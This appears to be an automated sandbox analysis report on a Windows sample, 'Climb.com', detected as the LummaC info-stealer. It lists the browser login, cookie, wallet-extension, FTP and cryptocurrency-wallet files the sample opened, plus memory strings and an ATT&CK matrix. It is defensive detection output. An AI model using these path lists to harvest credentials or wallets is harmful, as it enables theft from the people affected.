Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Climb.com	Binary or memory string: WIN_81
Source: Climb.com	Binary or memory string: WIN_XP
Source: Alt.11.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Climb.com	Binary or memory string: WIN_XPe
Source: Climb.com	Binary or memory string: WIN_VISTA
Source: Climb.com	Binary or memory string: WIN_7
Source: Climb.com	Binary or memory string: WIN_8

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\AIXACVYBSB			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\AIXACVYBSB			Jump to behavior

Source: Yara match	File source: 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.3296131318.000000000457B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.3296328079.000000000457B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Climb.com PID: 5660, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Climb.com PID: 5660, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00572263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		14_2_00572263
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00571C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		14_2_00571C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	21 Access Token Manipulation	12 Software Packing	NTDS	239 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 DLL Side-Loading	LSA Secrets	1071 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	111 Masquerading	Cached Domain Credentials	461 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
